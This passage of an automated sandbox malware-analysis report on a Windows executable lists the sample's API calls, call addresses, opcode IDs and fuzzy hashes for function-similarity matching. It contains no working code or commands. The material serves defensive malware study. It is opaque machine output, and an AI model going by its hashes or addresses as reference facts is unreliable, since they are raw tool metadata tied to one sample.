1449->1425 1454->1400 1466 412764-412766 1454->1466 1466->1400 1466->1436
APIs
  • Part of subcall function 004105E9: _CxxThrowException.MSVCRT(?,00417298), ref: 00410603
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,(nA,?,00416DD8), ref: 00412643
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,(nA,?,00416DD8), ref: 0041279B
Strings
Similarity
• API ID: ??3@$ExceptionThrow
• String ID: (nA
• API String ID: 2803161813-867891557
• Opcode ID: d538e313846df92285687d0c89883c737322acd0d92d246c018a36ad655cc348
• Instruction ID: 0ece9700425cb4d864afba528f8150fdb1f56e7dd499115c8cef0e07f043e1c2
• Opcode Fuzzy Hash: d538e313846df92285687d0c89883c737322acd0d92d246c018a36ad655cc348
• Instruction Fuzzy Hash: A9814B70A00605AFCB24DFA5C591AEEFBF6BF08314F14452EE515E3391D7B8AA90CB58
APIs
• SysAllocString.OLEAUT32(?), ref: 0040CBC4
• _CxxThrowException.MSVCRT(?,00416FBC), ref: 0040CBE7
Strings
Similarity
• API ID: AllocExceptionStringThrow
• String ID: PlA
• API String ID: 3773818493-1533977103
• Opcode ID: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
• Instruction ID: 296fbbf4859103af06767512d87f49f38bd905f8065bfdcdd98956010b0ea552
• Opcode Fuzzy Hash: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
• Instruction Fuzzy Hash: 54E0ED71600304EADB209F65E8829D6BBF8EF04785710C53FF948DA250E7B9E980C79C
APIs
  • Part of subcall function 0040236F: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
  • Part of subcall function 0040236F: GetProcAddress.KERNEL32(00000000), ref: 00402386
  • Part of subcall function 0040236F: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
• ??3@YAXPAX@Z.MSVCRT(00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E21
• ??3@YAXPAX@Z.MSVCRT(?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E29
• ??3@YAXPAX@Z.MSVCRT(?,?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E31
Similarity
• API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
• String ID:
• API String ID: 1642057587-0
• Opcode ID: 8fe8159aa8f9171a80473dbbf27a02bdac3fe5d52869d40b93b57f1e27a36c33
• Instruction ID: 921b34b2ca4cae370864143a871e5ac41304b7093d26a65462705394026d5d48
• Opcode Fuzzy Hash: 8fe8159aa8f9171a80473dbbf27a02bdac3fe5d52869d40b93b57f1e27a36c33
• Instruction Fuzzy Hash: A8515FB2D04109AADF01EFD1CD919FEBB7DAF04309F04406AF511B62C1D7799A4ADB98
APIs
• ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,00419810,ExecuteFile,0000002F,0000002F,?,00406616,?,00419810,00419810), ref: 00401739
• ??2@YAPAXI@Z.MSVCRT(00000040), ref: 004017D6
  • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
  • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
  • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
  • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
Strings
Similarity
• API ID: ??2@FileTime$??3@AttributesSystemlstrlen
• String ID: ExecuteFile
• API String ID: 1306139538-323923146
• Opcode ID: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
• Instruction ID: 9484230cc67166f2f755b6e2650531b124a09860f62e081dc195098c01fa7d0a
• Opcode Fuzzy Hash: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
• Instruction Fuzzy Hash: 6531E375700204BBCB20ABA5CC89CAFB7B9EFC4705728086FF405E73A1DB799D408628
APIs
• ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
• memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
Similarity
• API ID: ??2@??3@memmove
• String ID:
• API String ID: 3828600508-0
• Opcode ID: 0714fe3c1df4fdca5aeeb7c8bbfd15098e1df3d209b63f798c6738da8b9a7e44
• Instruction ID: 4d808faca08bf89b0fd6c24434e0160128b2010f8b4ad61872e4f6e811daac21
• Opcode Fuzzy Hash: 0714fe3c1df4fdca5aeeb7c8bbfd15098e1df3d209b63f798c6738da8b9a7e44
• Instruction Fuzzy Hash: 28F08232600720AFD2305F27DD8095BB7A9EBC47153148D3FE5AD92350CAB5E8518659
APIs
• GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004026F3
Strings
Similarity
• API ID: GlobalMemoryStatus
• String ID: @
• API String ID: 1890195054-2766056989
• Opcode ID: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
• Instruction ID: 06539b43d6f5c2ce11291560a72fbbc8528a2f3b0367cc898c628306ed72bb09
• Opcode Fuzzy Hash: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
• Instruction Fuzzy Hash: 20F0C2309102089ACF19AF70DA9DBAF3BA4BF00348F104A3AD462F72D0D7F8D845864C
APIs
Strings
Similarity
• API ID: ??3@
• String ID: lA
• API String ID: 613200358-262130271
• Opcode ID: 90b0b06cd13890f620005806bac62f7fad3fb4d0d322495d17032a83e40ec68c
• Instruction ID: be810f4beaf6972e7a5014057c92b7027d0de42a9649241163ddb4af855fb9b0
• Opcode Fuzzy Hash: 90b0b06cd13890f620005806bac62f7fad3fb4d0d322495d17032a83e40ec68c
• Instruction Fuzzy Hash: 73F01CB26007119BC320EF58D845B87B7E8AF44304B148A3FE48997651E7B8E985CBED
APIs
Similarity
• API ID: ??3@H_prolog
• String ID:
• API String ID: 1329742358-0
• Opcode ID: bd67a156173473a68c65af7978f3cde24eb8832407ae1c7884f978518f4fb4eb
• Instruction ID: 10f57f22a906aa0b0a42583f003833c21146b94334aab583da89fc310c08d6c6
• Opcode Fuzzy Hash: bd67a156173473a68c65af7978f3cde24eb8832407ae1c7884f978518f4fb4eb
• Instruction Fuzzy Hash: A5410232804014ABCB15DBA4C989AFE7B34EF06304B1440ABF401776A2DABD5EC9975D
APIs
• ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 0040251F
• ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 00402543
Similarity
• API ID: ??2@??3@
• String ID:
• API String ID: 1936579350-0
• Opcode ID: b4df439f1ba102251751b61151d0347022af4275d8d69c1088113cf519c099ee
• Instruction ID: ee6e1bd81e6d65453633442f6a1d57c69857676589945f0ce02378b43b8f31e2
• Opcode Fuzzy Hash: b4df439f1ba102251751b61151d0347022af4275d8d69c1088113cf519c099ee
• Instruction Fuzzy Hash: 0DF09035004652AFC3309F29D994843F7E4AF55705720887FE1DAC33A2C674A880C768
APIs
• SetEnvironmentVariableW.KERNELBASE(?,?,?,00000000,?,?,00406260,?,00000000,0000000A), ref: 00404630
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00406260,?,00000000,0000000A), ref: 00404639
                                                                      Similarity
                                                                      • API ID: ??3@EnvironmentVariable
                                                                      • String ID:
                                                                      • API String ID: 3880889418-0
                                                                      • Opcode ID: 22152b305ce174b67320051486f034778fb1b596505a7c24a7f213f79468360f
                                                                      • Instruction ID: b821aa63e9602637d8feb686bb827f934507ba03fca214f0c99b91fc16a187d9
                                                                      • Opcode Fuzzy Hash: 22152b305ce174b67320051486f034778fb1b596505a7c24a7f213f79468360f
                                                                      • Instruction Fuzzy Hash: BDF05836900118AFCB01AF98EC458CE77B8EB48704B41807AE922A72A1DB34AD418B8D
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040C914
                                                                      • GetLastError.KERNEL32(?,?,?,?), ref: 0040C922
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastPointer
                                                                      • String ID:
                                                                      • API String ID: 2976181284-0
                                                                      • Opcode ID: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                                      • Instruction ID: 5a685d8d3943d7b2e7289d0006b4b3d46cacc15a83080b067a3dad9829954c10
                                                                      • Opcode Fuzzy Hash: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                                      • Instruction Fuzzy Hash: F7F0DAB5900208FFCB04CF94D9849EE7BB5EF49310B108669F915A73A0D7359E50DB64
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0040DA2D
                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040DA4C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave
                                                                      • String ID:
                                                                      • API String ID: 3168844106-0
                                                                      • Opcode ID: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
                                                                      • Instruction ID: 5d27eff888a04a2a1af920e5c8fe564bbb0a5ef9a93153a65d570a8b15afed72
                                                                      • Opcode Fuzzy Hash: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
                                                                      • Instruction Fuzzy Hash: ADF01D36600214EBCB119FD5DC08E9ABBA9FF99761F10442AFA41A7260C771E811DFA4
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                                      • Instruction ID: d622825666b969e0cf609659fb89c84123d12be518dfc819517b0c3290ecd380
                                                                      • Opcode Fuzzy Hash: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                                      • Instruction Fuzzy Hash: 0421713160020ADFCB20EFA6D495AEE7775AF40308F14447EF816AB281DB78ED85CB55
                                                                      APIs
                                                                      • SetFileAttributesW.KERNELBASE(?,?), ref: 00401296
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                                      • Instruction ID: 365df7105ab9a04826b78ec900b125106ca9408a1d9c2f09e43ac9e2ec372a14
                                                                      • Opcode Fuzzy Hash: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                                      • Instruction Fuzzy Hash: 79F05E32504601EFC720AF69D840BA777F5FB88300F08482EE486F25B0D378B881CB59
                                                                      APIs
                                                                        • Part of subcall function 0040C88E: CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4), ref: 0040C981
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateFileHandle
                                                                      • String ID:
                                                                      • API String ID: 3498533004-0
                                                                      • Opcode ID: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                                      • Instruction ID: bfcfdadf78b221de7b75783111638f87db2d9d80aed60170162fb1aa82d728bf
                                                                      • Opcode Fuzzy Hash: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                                      • Instruction Fuzzy Hash: 3BE08637000219BBCF115FA4EC41BCE3F55AF097A0F144626FA14A61F0D772C971AB99
                                                                      APIs
                                                                      • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040D0BE,00000001,00419858,00419858,0041549C,?,00405599,?,?), ref: 0040CAC3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                                      • Instruction ID: 88aaa84a90d32b64ed1f6dd0793a6e1d7fbd9e1969eb2b8b5a1cb2f912c455e2
                                                                      • Opcode Fuzzy Hash: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                                      • Instruction Fuzzy Hash: 55E0C275640208FFDB01CF95C841BDE7BB9AB48354F10C169E9189A260D3799A50DF54
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: _beginthreadex
                                                                      • String ID:
                                                                      • API String ID: 3014514943-0
                                                                      • Opcode ID: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                                      • Instruction ID: 033854197d412f734f15e9e19b3d909a116f00c1e253b1452bfc5409eef9a5ef
                                                                      • Opcode Fuzzy Hash: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                                      • Instruction Fuzzy Hash: 97D017F6900208BFCF01EFA0CC45CEB3BADEB08204B004464B905C2110E671DA109BA0
                                                                      APIs
                                                                      • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040C9FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                                      • Instruction ID: 10957c0686827aba29bf6b3fca61d148a92be0f7cf9b29a220708a815fa9a989
                                                                      • Opcode Fuzzy Hash: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                                      • Instruction Fuzzy Hash: 96E0EC75200208FFDB01CF90CD41FDE7BBEEB49754F208058E9049A160C7759A10EB54
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
                                                                      • Instruction ID: 86de7528c5b8e745b9feb2f1f2e8827419998e537f7b53f3733c02d1bff58703
                                                                      • Opcode Fuzzy Hash: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
                                                                      • Instruction Fuzzy Hash: 54D012B6A00108BBDB159F85E945BDEF778EB5135AF10402FB001A1540D7B85A519669
                                                                      APIs
                                                                      • SetFileTime.KERNELBASE(?,?,?,?,0040CA9D,00000000,00000000,?,00401283,?), ref: 0040CA81
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: FileTime
                                                                      • String ID:
                                                                      • API String ID: 1425588814-0
                                                                      • Opcode ID: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                                      • Instruction ID: de5aedd212665daa2fb0c30df7e581d57bf74256c4b77fd25e19f66411ac9bb8
                                                                      • Opcode Fuzzy Hash: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                                      • Instruction Fuzzy Hash: 09C04C36158105FFCF020FB0CC04C5ABFA2AF99311F10C918B159C4070C7328024EB02
                                                                      APIs
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000060), ref: 0040CEFE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@
                                                                      • String ID:
                                                                      • API String ID: 1033339047-0
                                                                      • Opcode ID: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                                      • Instruction ID: cab80700ff2ef97e3e68849728e007b5961c94ff6a6edc9b3495ca6231c3d80c
                                                                      • Opcode Fuzzy Hash: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                                      • Instruction Fuzzy Hash: 23214A32604246DBCB34AF61D8D086BB3A6AF403557244A3FE442776D1C738AC479BDA
                                                                      APIs
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@
                                                                      • String ID:
                                                                      • API String ID: 1033339047-0
                                                                      • Opcode ID: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                                      • Instruction ID: 04593239a52e0b24a0a84900efeb5de78bbbd7c33ac0e85a63675f9701e427e5
                                                                      • Opcode Fuzzy Hash: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                                      • Instruction Fuzzy Hash: 92D0223230422029DA64393A0907AFF4C8C8F90361F00487FB804EA2C1ED7CCE81228D
                                                                      APIs
                                                                      • CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                                      • Instruction ID: 46fd5d44533f688af1cbb16b01e3684df0873ba17e3ffd79ac6e97726efa63b3
                                                                      • Opcode Fuzzy Hash: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                                      • Instruction Fuzzy Hash: 53D0123220456186DA782F7CB8C45C237D96E56331331476BF0B6D72E4D3788C835A98
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040D8FF,?,?,?,004096BF,?), ref: 00402755
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                                      • Instruction ID: ef3627dbe8ede4864a94ca482c41f1f7a661cdc9e7d225e9ae9e2bc502ca7986
                                                                      • Opcode Fuzzy Hash: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                                      • Instruction Fuzzy Hash: D5C0803014430079ED1137608E07B4936526B80716F50C465F344540F0D7F544005509
                                                                      APIs
                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000,0040D8A7,00000000,?,0040D8F6,?,?,004096BF,?), ref: 00401D0C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: FreeVirtual
                                                                      • String ID:
                                                                      • API String ID: 1263568516-0
                                                                      • Opcode ID: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
                                                                      • Instruction ID: 1004f56851fc8b889ccfe642d75eb19623be02efc3220bf612975ac128c53eb9
